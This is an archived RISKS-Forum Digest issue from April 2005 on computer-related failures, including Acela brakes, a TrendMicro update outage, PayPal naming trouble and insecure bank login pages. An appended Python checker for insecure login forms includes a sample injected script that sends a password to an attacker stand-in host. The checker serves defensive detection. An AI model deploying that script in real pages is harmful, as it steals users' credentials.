RISKS-LIST: Risks-Forum Digest  Tuesday 26 April 2005  Volume 23 : Issue 85

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/23.85.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:
Amtrak's high-speed Acela trains sidelined until summer (Monty Solomon)
Amtrak woes echo standard software engineering complaints (Michael J Harrison)
Remote computer locks the doors, or does it? (Mark Lutton)
Hacker broke into CMU computers (Bill Schackner via Monty Solomon, Bob Heuman)
Another out-of-bounds condition that needs NO checking (David Lesher)
A large scale disruption caused by incorrect virus-definition file (Chiaki)
The risks of opening a PayPal account (Ross Anderson)
Risks of having a distinctive surname (Stefek Zaba)
SFPD officer accused of using airport cameras to ogle women (Bob Van Cleef)
Trial ID card scheme is withdrawn in Cornwall (Chris Leeson)
Audit shuts down Minnesota Car License Web (Steven Hauser)
Oops! US Air round trip for $1.86 (Howard M Israel)
Banks still force users to be vulnerable to ID theft (Brad Hill)
"The national phone system failed"? (Mark Brader)
Re: Michigan message board says speed limit 100 mph (Jeffrey Waters)
Re: SecurID and E*TRADE (Jonathan Lewthwaite, Kurt Raschke)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Thu, 21 Apr 2005 01:12:32 -0400
From: Monty Solomon <monty@private>
Subject: Amtrak's high-speed Acela trains sidelined until summer

Amtrak will not be able to run any of its high-speed trains until the summer because of delays in getting replacement parts to correct brake problems on Acela Express cars.
The brakes were to last 1 million miles; the current Acela fleet had about half of that mileage. Amtrak pulled all of its 20 Acela trains out of service on Friday after finding millimeter-size cracks in 300 of the fleet's 1,440 disc brake rotors. Each Acela train has 72 brakes. This part is unique to the Acela and there is no active production line casting them. Fewer than 70 disc brakes are currently available. [Source: The Associated Press, article by Donna De La Cruz, 20 Apr 2005; PGN-ed]
http://www.boston.com/news/local/massachusetts/articles/2005/04/20/amtraks_high_speed_acela_trains_sidelined_until_summer/

  [Amtrak had cannibalized parts from other trains to get one or two trains able to run, but quickly abandoned that effort. Risks of custom design and no spare parts... Risks of building a system that really required new tracks, rather than trying to run on old tracks... PGN]

------------------------------

Date: Tue, 19 Apr 2005 16:32:23 -0700
From: Michael J Harrison <mharrison@private>
Subject: Amtrak woes echo standard software engineering complaints

A paragraph from an op-ed in *The New York Times*, 19 Apr 2005 (http://www.nytimes.com/2005/04/19/opinion/19tierney.html):

  "He chronicled the Acela mistakes, starting with Amtrak's decision to build a new train instead of modifying an existing European one, and to build it as a working train without first testing a prototype. The result was a long series of problems, design changes and lawsuits between Amtrak and its Canadian contractor, each accusing the other of botching the job."

It seems that old-fashioned mechanical engineering is not immune from the ills commonly ascribed to its software counterpart.

------------------------------

Date: Thu, 21 Apr 2005 11:32:00 -0400
From: <Mark.Lutton@private>
Subject: Remote computer locks the doors, or does it?

I found this at http://www.stupidsecurity.com, which references http://www.wral.com/news/4354102/detail.html

Wake County, N.C.
uses a central computer to lock 50 of its buildings in and around Raleigh. The Wake County Animal Shelter was closed on Easter Weekend, but the computer didn't know that. The doors were left unlocked and several animals were stolen from the shelter.

It would be cynical of me to note that animal shelters are one service where pilferage of the goods reduces net costs, so I won't.

------------------------------

Date: Sun, 24 Apr 2005 01:09:26 -0400
From: Monty Solomon <monty@private>
Subject: Hacker Broke Into CMU Computers (Bill Schackner)

A hacker who tapped into business school computers at Carnegie Mellon University may have compromised sensitive personal data belonging to 5,000 to 6,000 graduate students, staff, alumni and others.

The breach confirmed by officials in the Tepper School of Business is the latest in a recent string of campus computer break-ins nationally and the second since early March affecting Tepper.

There is no evidence that any data, including Social Security and credit card numbers, have been misused, officials said. But they have begun sending e-mails and letters alerting those affected. They include graduate students and graduate degree alumni from 1997 to 2004, master's of business administration applicants from September 2002 through May 2004, doctoral applicants from 2003 to this year, and participants in a conference that was being arranged by the school's staff. ...

[Source: Bill Schackner, *Pittsburgh Post-Gazette*, 21 Apr 2005]
http://www.post-gazette.com/pg/05111/491836.stm

------------------------------

Date: Thu, 21 Apr 2005 16:50:58 -0400
From: Bob Heuman <rsh@private>
Subject: Hacker Broke Into CMU Computers

Another case of not knowing how long the exposure existed and therefore how much exposure the personal information really had. Once again we have Social Security Numbers, credit card data, etc. exposed for an indeterminate amount of time.
I have gone to the university's own web site and the Tepper School web site and neither has any mention of this report as of the time I checked, which is Apr 21 at 4:45PM EDT.
http://kdka.com/local/local_story_111102454.html

------------------------------

Date: Thu, 21 Apr 2005 12:16:07 -0400 (EDT)
From: David Lesher <wb8foz@private>
Subject: Another out-of-bounds condition that needs NO checking
X-URL: http://www.nytimes.com/2005/04/21/nyregion/21check.html?pagewanted=print&position

*The New York Times*, 21 Apr 2005

New York City's school system recently agreed to pay $86,000 to the lawyer of a child with autism to cover special educational services for his client. But when the lawyer opened his mail on Tuesday, he found a check for slightly more: $8.6 million.

{off-by-one decimal point; usual excuses cited...}

------------------------------

Date: Tue, 26 Apr 2005 02:14:34 +0900
From: Chiaki <ishikawa@private>
Subject: A large scale disruption caused by incorrect virus-definition file

It is widely reported in Japan that an errant virus definition distributed by an anti-virus PC software company caused a large scale disruption of businesses and individual users.

The company, TrendMicro with its headquarters in Tokyo, has been selling its anti-virus PC software products for quite some time. Its first product was developed in 1991.

Now, on Saturday morning 07:30 (JST), the software's automatic update site in the Philippines released a new virus definition file which, according to the company's comment, was not adequately tested. This file was picked up by many users in Japan and abroad who either automatically or manually invoked the virus definition update function of the software.

Unfortunately, Windows XP SP2 and Windows 2003 server users with this software installed (there are a few variants of the products in the software suite and a few of them were affected)
and updated the definition file AND rebooted the PC after the update (as suggested by the software, it seems) saw the CPU usage go up to 100% immediately after booting and could not do much on their PCs. The problem was that the incorrect update caused infinite looping of the scanning of a certain system file and no CPU time was left for any other task. (If the user didn't reboot and waited for another several hours, the re-worked update file was again automagically picked up if the automatic update feature was enabled and there would be no harm.)

According to the various reports, corporate licensees include media big names such as Asahi Shimbun newspaper, Kyodo wire news service, and the reservation division of railway company JR East. (The company puts the user number at around 10 million individual users.)

I noticed the early reports of disrupted computer networks at Asahi Shimbun and Kyodo wire service on Saturday morning and wondered what could cause LAN disruption at such well-protected places. (It seems that the DHCP client could not get an address after boot due to the heavy CPU load inside the anti-virus service.)

After many inquiries began pouring in, the company checked and released the re-worked virus definition file. However, 170,000 downloads took place while the incorrect definition was on the download server. Many individual or small business users who didn't realize the problem was caused by the virus definition update brought their PCs to tech service companies or re-installed the OS, etc. Some had their disks re-formatted.

The scale of the disruption was rather large and on Saturday evening many TV stations carried the news of the disruption with the correct cause identified. Some affected users who tried to `fix' their computer noticed these news broadcasts and could now bring their PC into normal status.

The word cyberterrorism came to my mind, but it is ironic that the cause was due to inadequate testing at an anti-virus software corporation.
Of course, we will see whether the release of the definition file without adequate testing was a deliberate act or simple neglect.

Lucky me: I am using Symantec Anti-Virus software on a Windows PC, and Linux on another PC. Diversity is wonderful when we can afford it.

PS: The remedy was to reboot the computer into safe mode (after a forced power-off in many cases), replace the errant file and reboot. The anti-virus software would now pick up the new corrected file.

PPS: I think I should add, in order to convey the scale of the problem, that we now know on Monday morning that on Saturday:

 - the JR railway reservation division could not check reservation status (fed via network to PCs?) and so diverted (telephone) inquiring customers to manned counters at railway stations,
 - Kyodo wire service could not send out automatic wire service news for a few hours, and so resorted to sending out important news via FAX (I believe that the initial news articles from Kyodo were sent in this manner),
 - the Osaka subway system saw the computer that distributes accident information to its stations fail to reboot, and
 - Toyama city's election committee could not handle advance voting for its mayoral and city alderman elections on their computer and had to resort to manual processing.

These are just some of the problems reported in the Japanese press Monday morning. However, life goes on as usual as of Monday morning as far as I can tell. (But those unfortunate companies who suffered from the problem over the weekend may be having a hectic time right now.)

------------------------------

Date: Tue, 26 Apr 2005 16:16:33 +0100
From: Ross Anderson <Ross.Anderson@private>
Subject: The risks of opening a PayPal account

Regular RISKS readers know that many things can go wrong with naming and authentication. Here is an interesting example.

I opened a PayPal account on the 18th April and tried to link it to a checking account I have at a UK bank (the NatWest).
The PayPal website balked at the name of the bank branch ("Cambridge King's Parade") on the grounds that it contained a non-ASCII character. It was also too long for the web form. All I could do was enter "Cambridge" and hope for the best.

Now it's prudent for programmers to check input, but this is rather extreme. After all, most of the names of people and places in this world are non-ASCII. Compulsory asciification turns that inoffensive Italian, Signor de'Ath, into the sinister Transylvanian Mr Death.

Also, when I worked in banking many years ago, a common source of fraud was that when money arrived at the wrong branch, staff put the money into a "suspense account" while they queried the sender. Fraud and abuse involving suspense accounts was a serious problem. So I tried to bring to PayPal's attention that their web page was not merely culturally inappropriate, but also a security vulnerability. I was unable to get their help-desk to link up successive e-mails about the issue, let alone refer me to someone who could talk policy.

So far, so broken. I reported the incident on a local mailing list (ukcrypto) where one of the regulars informed me that the King's Parade branch had in fact closed, with all the customers being transferred to another branch. This was the first I'd heard of it! I walked by my bank branch and found it indeed closed. The two small payments that PayPal said it would send to my bank account, to check I have access to the bank statements, have vanished.

You just could not make this up. PayPal relies for authentication on bank branch names, which a large UK bank will change without notifying its customers (at least, not in any way I noticed). I won't even begin to speculate about all the possible risks.
Ross Anderson
http://www.cl.cam.ac.uk/users/rja14/

------------------------------

Date: Thu, 21 Apr 2005 19:40:59 +0100
From: Stefek Zaba <stefek.zaba@private>
Subject: Risks of having a distinctive surname

Generally, having a distinctive forename-surname combination serves me well enough: not much chance of double-booking in hotels, and people find it easy enough to remember. There's a privacy downside, in that once you know the surname and city (country, even) I'm not hard to find. And I acquired the obvious surname-related domain, zaba.com, getting on for a decade ago.

Then, about the middle of March 2005, my inbox started to attract angry emails: "remove me from your Website immediately"! Since the www.zaba.com page has been unchanged since my mid-1997 entry on "what I did in the UK crypto-policy wars", I at first thought this was a new form of e-mail address harvesting -- send an angry accusation, attract an indignant response, email address confirmed. But few of the correspondents' addresses seemed suspect, and when I got one from a .mil address I started filing them away.

It took another week or so for one of the e-mails to identify, by way of a screenshot, which website people were concerned about. US readers will have cottoned on by now; but for The Rest Of Us: a new people-searching website has appeared in the US, under the name of zabasearch.com. Frantically trying to deal with their unhelpful "optout" procedures (which change frequently, and require you to submit personal data!), some people hit on the idea that zaba.com would be a better place to send emails, or Googled for the unusual word in question and found my email address. It's since been circulated in warning messages which get passed on in Craig Shergold fashion.

zabasearch.com themselves say they're 'only republishing publicly available information'.
RISKS readers, well-versed in notions of fair information handling, will just about be able to grasp the distance between "on file at the county records office", and "made available at no cost, pre-indexed by name". What's made available for free is basic personal info - name, address, phone numbers, years-at-address; for a fee they'll do further background checks. All with the same rigorous attention to data quality which has led colleagues to find themselves listed under addresses they left several years ago, and having 30 years added to their age.

What's been interesting is receiving over a hundred angry "REMOVE ME"s, only three or four of which identified the website in question. "Clearly", with that website covered in Zaba-this and Zaba-that, the great majority of correspondents observed the name coincidence and inferred identity. Carl Ellison's "10 RISKS of PKI", and the SPKI work about the unreliability of global naming, just got validated again, at my expense.

More gory details over at < http://www.zaba.com >

Stefek Zaba, HPLabs, Bristol, England

  [Many thanks. Having a unique name sounds like a recipe for Zaba-loney. Or maybe someone is being fed Za-baloney? PGN]

------------------------------

Date: Thu, 21 Apr 2005 12:42:08 -0700
From: Bob Van Cleef <bob@private>
Subject: SFPD officer accused of using airport cameras to ogle women

Another case of "who is watching the watchers".

According to a report on a local TV station, KTVU 2 in San Francisco, CA, a police officer is facing possible disciplinary action for allegedly using surveillance cameras at San Francisco International Airport to ogle women as they walked through the terminal.
http://www.ktvu.com/news/4398749/detail.html

------------------------------

Date: Tue, 19 Apr 2005 13:33:04 +0100
From: "LEESON, Chris" <chris.leeson@private>
Subject: Trial ID card scheme is withdrawn in Cornwall

The BBC News site has an article reporting that an ID card system being used in Cornwall has been withdrawn:

  "Plans for national ID cards may need to be reconsidered following the breakdown of a pilot project in Cornwall. The 'smart card' was tested through the Cornish Key scheme, but now the trial is to be withdrawn, despite an investment of £1.5m of government cash."

The withdrawal is being blamed on problems with the readers, and the system is being replaced by a newer system with "dumber" smart cards.

http://news.bbc.co.uk/1/hi/england/cornwall/4459493.stm

------------------------------

Date: Tue, 19 Apr 2005 15:42:28 -0500 (CDT)
From: Steven Hauser <hause011@private>
Subject: Audit shuts down Minnesota Car License Web

The Minnesota Legislative Auditor report shut down a web service:

  Department of Public Safety Web-based Motor Vehicle Registration Renewal System Security Audit
  Security Controls as of March 2005
  http://www.auditor.leg.state.mn.us/fad/2005/fad05-23.htm

The report based its audit on the Open Web Application Security Project's top ten list (http://www.owasp.org/documentation/topten.html) and a previous audit in 2001 in which the findings and recommendations were ignored.

This story was front page news in the *Saint Paul Pioneer Press* and *Minneapolis Tribune* on 19 Apr 2005.

Other MN Department of Public Safety website shutdowns prompted by the Minnesota Legislative Auditor include the Bureau of Criminal Apprehension's CriMNet. The legislative auditor seems to find a lot of RISKS in the Department of Public Safety.

Steven Hauser
http://www.tc.umn.edu/~hause011/

------------------------------

Date: Tue, 19 Apr 2005 11:40:11 -0400
From: "Israel, Howard M (Howard)" <hisrael@private>
Subject: Oops!
US Air round trip for $1.86

http://money.cnn.com/2005/04/19/news/fortune500/usair_cheap_flights/index.htm?cnn=yes

Oops! US Air round trip for $1.86
Report: Carrier will honor more than 1,000 tickets sold at discounted price due to computer glitch.

The airline also was hit by what its chief executive termed a "meltdown" of its baggage system </2004/12/27/news/fortune500/plane_woes/> during the Christmas holiday. That problem resulted in it sending some flights out of its Philadelphia hub without any bags.

------------------------------

Date: Wed, 20 Apr 2005 12:52:05 -0600
From: Brad Hill <hillbrad@private>
Subject: Banks still force users to be vulnerable to ID theft

This may have been discussed before, but with the recent spate of DNS cache poisoning attacks and fake WiFi hotspot proliferation I believe it has new relevance.

I was actually rather shocked to find that U.S. Bank (http://www.usbank.com/), Chase (http://www.chase.com) and Bank of America (http://www.bankofamerica.com) all still *force* users to enter their login and password on an insecure page. This exposes account holders to a great risk of their credentials being stolen.

The login forms on their genuine home pages are submitted to a secure site, as they claim. The problem is that you need security *before* you enter your data. If DNS, a router or a proxy server anywhere along the path to their server were compromised, the login page could be substituted for one that submits to another site or injected with JavaScript that sends info elsewhere, asynchronously, before it goes to the real destination. Without an SSL certificate chain there is no way to verify that the insecure page with the form came from a trusted source and no way short of exhaustive code inspection to tell where the form data is actually going.

BankOne, Wells Fargo, Citi, Washington Mutual, Bank of the West, Key Bank and Sun Trust all offer SSL versions of their login page, but for some reason, U.S.
Bank, BofA and Chase redirect to an insecure site or return an error when trying to connect with SSL. You *can't* log in securely, even if you try.

The existence of this kind of obvious and fundamental security mistake after all the publicity about this category of attack (note that all these banks *do* have a user education page on phishing/fraud prevention!) is definitely something to keep in mind when choosing a bank.

------------------------------

Date: Mon, 18 Apr 2005 20:45:00 -0400 (EDT)
From: msb@private (Mark Brader)
Subject: "The national phone system failed"? (Goodman-Jones, Risks-23.84)

> Ch7 is one of the three national commercial TV stations in Australia.

"The national phone system failed", and what RISKS hears about is a *television* outage? Please tell me that this was just a careless wording!

Mark Brader, Toronto, msb@private

  [Probably not. TV is much more visible than electricity to many people... PGN]

------------------------------

Date: Tue, 19 Apr 2005 13:44:02 -0500
From: "Jeffrey Waters" <jwaters@private>
Subject: Re: Michigan message board says speed limit 100 mph (R 23 84)

While living in Florida, I always wondered what would happen if one of the message boards on northbound I-95 would have said something along the lines of "Notice - DEA Checkpoint 2 Miles"

------------------------------

Date: Mon, 25 Apr 2005 16:11:56 +0100
From: "Jonathan Lewthwaite" <JLewthwaite@private>
Subject: Re: SecurID and E*TRADE (Taft, RISKS-23.84)

Online security with usability problems?

In RISKS-23.84 Ed Taft wrote an article about the potential drawbacks of using a keyfob device to facilitate two-factor authentication. Ed made several observations of his experience and notes that:

  "... while this appears to have good security, some potential deficiencies come to mind: It requires more typing than the old scheme, including an unfamiliar sequence of characters that changes every time.
  A better arrangement would be for the keyfob to have a USB connector that I plug into my computer to prove that I have the keyfob."

This 'deficiency' has already been addressed: The solution is to allow the 'token' software to be installed on some other device such as a USB memory stick. This can then be used to prove that the authenticating user has the device (by plugging it in). For an example and explanation have a look at:
http://www.passgo.com/products/softwareTokens.shtml

To maintain the two-factor authentication plugging in the device by itself is not enough -- the user must supply something they know. As Ed noted this is an unfamiliar sequence of characters that changes every time. With the software token installed on your USB memory stick, supported applications can be configured to require a PIN allowing the challenge/response sequence to be handled automatically.

The solution ports to other common electronics that folks have such as PDAs and mobile devices giving even greater freedom to the end user.

For further information on the need for strong two factor authentication and solutions RISKS readers can follow this up at:
http://www.passgo.com/products/defender/index.shtml

Jonathan Lewthwaite, Technical Account Manager, www.passgo.com

------------------------------

Date: Mon, 18 Apr 2005 20:59:42 -0400
From: Kurt Raschke <kurt@private>
Subject: Re: SecurID and E*TRADE (Taft, RISKS-23.84)

Ed Taft's commentary in RISKS-23.84 on E*TRADE's apparent use of RSA's SecurID system to authenticate users to their website raised a few points that I think merit additional consideration.

On Ed's first point, about the added typing necessitated by the system and his desire that it have a USB plug: Having a keyfob with a display allows the device to be used with any sort of computer--not every computer out there has a USB port, or one that is user-accessible. What if you log in using a phone or a PDA?
On multiple service providers using SecurID: Theoretically this could become a problem, but there's no reason why a trusted third party couldn't run a copy of RSA's ACE/Server (the app used to authenticate SecurID tokens) that others could connect to over a VPN to use for authentication. One token, many sites. (This, though, has plenty of inherent RISKs too.)

Finally, on his point about the keyfob's battery dying: RSA has a good plan for that--replace the unit. It's as simple as that.

Ed raises these issues as though E*TRADE is the first company to ever implement SecurID (and they may be the first to implement it for a public-facing service, but not the first ever), but in reality they are not very grave issues, and many government labs and other organizations find SecurID to be a good security method despite them.

The real RISK? Weaknesses in the SecurID system: http://www.homeport.org/~adam/dimacs.html.

------------------------------

Date: 29 Dec 2004 (LAST-MODIFIED)
From: RISKS-request@private
Subject: Abridged info on RISKS (comp.risks)

The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) if possible and convenient for you. Mailman can let you subscribe directly: http://lists.csl.sri.com/mailman/listinfo/risks
Alternatively, to subscribe or unsubscribe via e-mail to mailman your FROM: address, send a message to risks-request@private containing only the one-word text subscribe or unsubscribe. You may also specify a different receiving address: subscribe address= ... . You may short-circuit that process by sending directly to either risks-subscribe@private or risks-unsubscribe@private depending on which action is to be taken. Subscription and unsubscription requests require that you reply to a confirmation message sent to the subscribing mail address. Instructions are included in the confirmation message.
Each issue of RISKS that you receive contains information on how to post, unsubscribe, etc.
INFO [for unabridged version of RISKS information]
.UK users should contact <Lindsay.Marshall@private>.
=> SPAM challenge-responses will not be honored. Instead, use an alternative address from which you NEVER send mail!
=> The INFO file (submissions, default disclaimers, archive sites, copyright policy, PRIVACY digests, etc.) is also obtainable from <http://www.CSL.sri.com/risksinfo.html> The full info file may appear now and then in future issues.
*** All contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to risks@private with meaningful SUBJECT: line.
*** NOTE: Including the string "notsp" at the beginning or end of the subject line will be very helpful in separating real contributions from spam. This attention-string may change, so watch this space now and then. ***
=> ARCHIVES: ftp://ftp.sri.com/risks [subdirectory i for earlier volume i]
<http://www.risks.org> redirects you to Lindsay Marshall's Newcastle archive
http://catless.ncl.ac.uk/Risks/VL.IS.html gets you VoLume, ISsue.
Lindsay has also added to the Newcastle catless site a palmtop version of the most recent RISKS issue and a WAP version that works for many but not all telephones: http://catless.ncl.ac.uk/w/r
<http://the.wiretapped.net/security/info/textfiles/risks-digest/> .
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
<http://www.csl.sri.com/illustrative.html> for browsing,
<http://www.csl.sri.com/illustrative.pdf> or .ps for printing

------------------------------

End of RISKS-FORUM Digest 23.85
************************
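The checks that Brad Hill's item above (banks serving the login form over plain http) calls for, written out as an added example that is not part of this digest, of the item, or of any bank's code. It assumes nothing beyond the Python standard library: given the URL a page was fetched from and its HTML, it reports every password form whose page did not itself arrive over https (so no certificate chain protects the form the user sees), whose action does not resolve to https, or whose method would put the credentials in the URL, and it counts the scripts present on an http page, since any one of them could have been injected in transit. The bank hostnames, page URLs, HTML and the beaconing script are constructed samples, not anything observed on the banks named in the item.

```python
"""Flag login pages that cannot be trusted before the user types a password."""
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


@dataclass
class Form:
    action: str                 # absolute URL the browser would submit to
    method: str = "get"
    has_password: bool = False


@dataclass
class PageReport:
    page_url: str
    forms: list = field(default_factory=list)
    script_srcs: list = field(default_factory=list)
    inline_scripts: int = 0


class LoginPageParser(HTMLParser):
    """Collects forms, password inputs and script tags from one page."""

    def __init__(self, page_url):
        super().__init__()
        self.report = PageReport(page_url)
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # A relative or empty action submits back to the page's own origin,
            # so it inherits the page's scheme; resolve it before judging it.
            self._form = Form(action=urljoin(self.report.page_url, a.get("action", "")),
                              method=(a.get("method") or "get").lower())
            self.report.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "text").lower() == "password":
                self._form.has_password = True
        elif tag == "script":
            if a.get("src"):
                self.report.script_srcs.append(urljoin(self.report.page_url, a["src"]))
            else:
                self.report.inline_scripts += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def analyze_page(page_url, html):
    parser = LoginPageParser(page_url)
    parser.feed(html)
    parser.close()
    return parser.report


def findings(report):
    """Transport-level problems with every password form on the page.
    An empty list means the form the user sees was itself authenticated and
    posts over https; it says nothing about the server's own code."""
    problems = []
    page_scheme = urlsplit(report.page_url).scheme.lower()
    for form in report.forms:
        if not form.has_password:
            continue
        if page_scheme != "https":
            problems.append("password form delivered over %s: the form itself is unauthenticated" % page_scheme)
        if urlsplit(form.action).scheme.lower() != "https":
            problems.append("password form posts to %s" % form.action)
        if form.method != "post":
            problems.append("password form uses %s; credentials would land in URLs and logs" % form.method.upper())
    if page_scheme != "https" and (report.inline_scripts or report.script_srcs):
        problems.append("%d inline and %d external script(s) on an unauthenticated page could rewrite or siphon the form"
                        % (report.inline_scripts, len(report.script_srcs)))
    return problems


# Constructed sample of the pattern the item describes: the home page arrives
# over http and only the form's action is https. The inline script stands in
# for whatever a DNS, router or proxy attacker could inject; it beacons the
# password to a third party before the genuine https POST ever happens.
UNSAFE_HOME_PAGE = """
<html><body>
<form action="https://online.bank.invalid/login" method="post">
  <input name="user" type="text">
  <input name="pw" type="password">
  <input type="submit" value="Log in">
</form>
<script>
  document.forms[0].onsubmit = function () {
    new Image().src = "http://attacker.invalid/c?" + encodeURIComponent(this.pw.value);
  };
</script>
</body></html>
"""

# The corrected arrangement: the login page itself is fetched over https, so
# the browser verified a certificate chain before it rendered the form.
SAFE_LOGIN_PAGE = """
<html><body>
<form action="/login" method="post">
  <input name="user" type="text">
  <input name="pw" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for url, html in (("http://www.bank.invalid/", UNSAFE_HOME_PAGE),
                      ("https://www.bank.invalid/login", SAFE_LOGIN_PAGE)):
        print(url)
        for problem in findings(analyze_page(url, html)) or ["no transport problems found"]:
            print("  -", problem)
```

Running it against a live site means fetching the page over whatever scheme the bank redirects you to and passing that final URL in as `page_url`; the resolved scheme, not the link you clicked, is what the check must judge. Note that the same safe-looking form served over http fails twice (unauthenticated page, and a relative action that resolves to http), which is exactly the "redirect to an insecure site" case the item complains about.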
This archive was generated by hypermail 2.1.3 : Tue Apr 26 2005 - 18:00:24 PDT